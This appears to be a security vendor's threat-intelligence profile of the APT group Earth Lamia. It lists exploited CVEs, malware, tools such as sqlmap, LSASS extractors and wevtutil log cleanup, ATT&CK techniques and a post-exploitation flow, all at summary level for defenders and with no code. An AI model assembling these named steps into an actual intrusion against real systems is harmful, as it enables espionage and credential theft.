Introduction
Earth Lamia is a China-linked Advanced Persistent Threat (APT) group conducting cyber espionage campaigns across Brazil, India, and Southeast Asia. Active since at least 2023, the group focuses on web application vulnerabilities, custom malware deployment, and systematic targeting of government, finance, and critical infrastructure sectors.
Historical Evolution
- 2023–Early 2024: Initial focus on financial services (e.g., securities firms) in South Asia
- Mid-2024: Expansion into logistics and online retail across Southeast Asia
- Late 2024–2025: Shift to academic, IT, and government entities, including critical infrastructure
Attribution is strongly linked to China based on toolsets, language artifacts, victimology, and operational patterns.
China-linked threat actors targeting web application vulnerabilities operate with patience and precision. Organizations running customer-facing applications in Asia need threat intelligence that reflects active targeting patterns.
Noorstream delivers threat intelligence, vulnerability management, and offensive security assessments for high-risk environments.
Technical Breakdown
Initial Access
- Systematic scanning for SQLi in public-facing apps
- Exploitation using tools like
sqlmap - Creation of rogue admin accounts (e.g.,
sysadmin123)
Exploited CVEs
- Legacy: CVE-2017-9805 (Apache Struts2), CVE-2021-22205 (GitLab)
- 2024: CVE-2024-9047, 27198/99, 51378/51567, 56145
- 2025: CVE-2025-31324 (SAP NetWeaver RCE)
Malware Arsenal
PULSEPACK (.NET modular backdoor)
- AES-encrypted TCP and WebSocket comms
- Plugin-based dynamic capability loading
- Deployed via DLL sideloading
BypassBoss
- Privilege escalation based on Sharp4PrinterNotifyPotato
Utility Stack
- Recon: Fscan, Kscan, nltest.exe
- Creds: SAM/LSASS memory extractors
- Persistence: schtasks.exe
- Cleanup: wevtutil.exe
- Tunnels: Rakshasa, Stowaway
TTPs (MITRE ATT&CK Mapping)
- Recon: T1595.002, T1590
- Access: T1190, T1078
- Execution: T1059.001, T1059.003
- Persistence: T1053.005, T1505.003, T1136.001
- Evasion: T1574.001, T1620, T1036.005
- C2: T1095, T1573.001
Post-Exploitation Flow
- Tool deployment via certutil.exe/PowerShell
- Web shell deployment
- Privilege escalation (Potato-family COM/DCOM exploits [2022 variant], JuicyPotato, BypassBoss)
- Credential harvesting
- Lateral movement
- Data exfiltration
- Log cleanup
Case Studies
REF0657 Campaign (2024)
Financial sector in South Asia; Cobalt Strike via MemoryEvasion; Sophosx64.exe as Potato-family privilege escalation module (2022 variant)
STAC6451 (2024)
Mimic ransomware attempts in India—unsuccessful, likely used for distraction
CL-STA-0048 (2025)
DNS exfiltration, hex staging, and SQLcmd abuse in South Asia
DragonRank Links
Potential operational overlap or coordination with another China-nexus APT
Strategic Implications
- Nation-State Objectives: Intelligence gathering on finance, telecom, and government
- Tool Adaptability: Weaponization of open-source and legacy tooling
- Infrastructure Abuse: High-volume IP use across Asia-Pacific
- Blurred Lines: Espionage mixed with pseudo-ransomware operations
Future Outlook
Earth Lamia is likely to:
- Continue weaponizing zero-days in enterprise platforms
- Improve malware stealth (e.g., more fileless, in-memory variants)
- Expand to target under-patched sectors like health, education, and energy
- Scale operations through automation (vuln scanning, loader chains)
Noorstream Perspective
Earth Lamia reflects a new class of APTs: high-discipline cyber actors merging legacy exploit reliability with modern malware modularity. Their operational flow—web app scanning → SQLi → sideloaded implants → staged exfil—demands continuous vigilance.
This threat reinforces our doctrine:
Context is the new perimeter. Patch priority is intelligence-driven. Legacy does not mean low-risk.
Every defender must transition from CVSS-based triage to contextual vulnerability management and threat-centric hunting.
References
Source: Trend Micro Research
Title: “Earth Lamia Develops Custom Arsenal to Target Multiple Industries”
Date: May 26, 2025
URL: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html
Source Type: Primary Threat Report
Attribution Confidence: High
Source: Elastic Security Labs
Title: “Unmasking a Financial Services Intrusion: REF0657”
Date: January 30, 2024
URL: https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657
Source Type: Incident Analysis
Attribution Confidence: High
Source: Fortinet FortiGuard
Title: “Earth Lamia APT Attack Campaign Overview”
Date: April 2025
URL: https://fortiguard.fortinet.com/outbreak-alert/earth-lamia-apt-attack
Source Type: Threat Summary
Attribution Confidence: Medium
Source: Unit42 (Palo Alto Networks)
Title: “Espionage Campaign Targets South Asian Entities”
Date: February 2025
URL: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/
Source Type: Campaign Analysis
Attribution Confidence: High
Source: The Hacker News
Title: “China-Linked Hackers Exploit SAP and Visual Composer Platforms”
Date: May 2025
URL: https://thehackernews.com/2025/05/china-linked-hackers-exploit-sap-and.html
Source Type: Exploit Disclosure Reporting
Attribution Confidence: High
Source: Cybersecurity Help CZ
Title: “APT Group Earth Lamia Exploits SQL Injection for Persistent Access”
Date: April 2025
URL: https://www.cybersecurity-help.cz/blog/4761.html
Source Type: Technical Threat Blog
Attribution Confidence: Medium
Source: LinkedIn Pulse – Bise Threat Research
Title: “Modular Backdoor Threats Target Brazil, India, Southeast Asia”
Date: September 2024
URL: https://www.linkedin.com/pulse/modular-backdoor-threats-risks-brazil-india-southeast-bise–5yl7e
Source Type: Malware Analysis
Attribution Confidence: Medium